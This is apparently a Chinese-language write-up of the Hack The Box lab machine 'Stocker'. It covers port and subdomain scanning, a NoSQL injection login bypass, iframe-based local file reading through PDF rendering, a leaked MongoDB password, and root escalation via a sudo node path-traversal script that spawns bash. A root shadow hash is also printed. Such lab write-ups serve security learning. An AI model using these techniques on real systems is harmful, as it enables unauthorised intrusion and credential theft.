基本信息
data:image/s3,"s3://crabby-images/9ebf4/9ebf40de0d892561a5868dfa8632099619a6d141" alt=""
端口扫描
22和80:
1 | nmap -sC -sV -Pn 10.10.11.196 |
80
需要加hosts:
1 | 10.10.11.196 stocker.htb |
data:image/s3,"s3://crabby-images/36801/36801008578a20c06c560f6b80d6eca5f214f7d6" alt=""
子域名扫描
子域名可以发现dev:
1 | ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u "http://stocker.htb/" -H 'Host: FUZZ.stocker.htb' -fs 178 |
dev
同样加hosts后访问,需要登录:
data:image/s3,"s3://crabby-images/d98cd/d98cde41db5668b4de0e2610de7ece86ab345fcb" alt=""
NoSQL injection
基础的NoSQL injection,需要修改使用json格式,绕过登录:
- NoSQL injection - HackTricks
https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass
data:image/s3,"s3://crabby-images/c0498/c04987f08c65e465379168b2067db3908cad0b72" alt=""
data:image/s3,"s3://crabby-images/48834/488348a0c520fcecbc582d0f62edec51446a8a04" alt=""
LFI
订单功能根据提交的参数渲染生成pdf,可以尝试提交iframe之类的,使其渲染时嵌入本地文件:
data:image/s3,"s3://crabby-images/2507f/2507fd9844723f92b65d1be2d840d3ebb9c153b7" alt=""
data:image/s3,"s3://crabby-images/21f9a/21f9a186e7d034804b30b6bf9cd73c14667b7106" alt=""
LFI
验证可行,后面就是一点点读文件:
data:image/s3,"s3://crabby-images/3fba8/3fba8ecc0edf885678273a12b0908e10837cc54b" alt=""
data:image/s3,"s3://crabby-images/5cf19/5cf1972fe3077bc72d6fb16055a22070d049de89" alt=""
index.js
/var/www/dev/index.js文件中得到密码:
1 | const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1"; |
user flag
passwd中得到的用户名angoose使用这个密码登录,得到user flag:
data:image/s3,"s3://crabby-images/49056/49056e368cdd73719216e029f40a36a233f20cf2" alt=""
提权信息
sudo使用node运行指定目录下 *.js
:
data:image/s3,"s3://crabby-images/2ec15/2ec15222428c3bb274631f4cf247cb946e72cd76" alt=""
因为这里是用的是 *.js
,那么 /usr/local/scripts/../../../../xxx.js
这种路径也是符合要求的,所以我们就能在可写目录写js文件,使用node运行执行任意命令
提权 & root flag
1 | sudo /usr/bin/node /usr/local/scripts/../../../tmp/exp.js |
data:image/s3,"s3://crabby-images/40713/40713f621c01333dea0b33d2b7e097d2d763e4a8" alt=""
exp.js
1 | const fs = require("child_process").spawn("/usr/bin/bash", {stdio: [0, 1, 2]}) |
shadow
1 | root:$6$EZqTwEpX4KybzpVB$BO02GOjBAfc/gEUXTNVQ3J2xQFeS4sGXNnr/zporRnTKZ46fskNi.ijPrSowdfcDn4xi4p.hCGVMaolooyHHv1:19332:0:99999:7::: |
参考资料
- NoSQL injection - HackTricks
https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass - Stocker - HTB [Discussion] | BreachForums
https://breached.vc/Thread-Stocker-HTB-Discussion